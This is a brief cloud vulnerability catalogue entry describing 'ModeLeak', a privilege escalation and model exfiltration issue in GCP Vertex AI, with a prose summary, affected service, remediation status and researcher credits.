high

ModeLeak: LLM Model Exfiltration Vulnerability in Vertex AI

Published Tue, Nov 12th, 2024

Platforms

gcp

Summary

A vulnerability in GCP's Vertex AI service allows privilege escalation and unauthorized access to sensitive LLM models. Attackers can exfiltrate these models by exploiting misconfigurations in access controls and service bindings. By exploiting custom job permissions, researchers were able to escalate their privileges and gain unauthorized access to all data services in the project. In addition, deploying a poisoned model in Vertex AI led to the exfiltration of all other fine-tuned models, posing a proprietary and sensitive data exfiltration attack risk.

Affected Services

VertexAI

Remediation

None required

Tracked CVEs

No tracked CVEs

References

Contributed by https://github.com/OfirBalassiano

Entry Status

Finalized

Disclosure Date

-

Exploitability Period

-

Known ITW Exploitation

-

Detection Methods

None

Piercing Index Rating

-

Discovered by

Ofir Balassiano, Ofir Shaty, Palo Alto Networks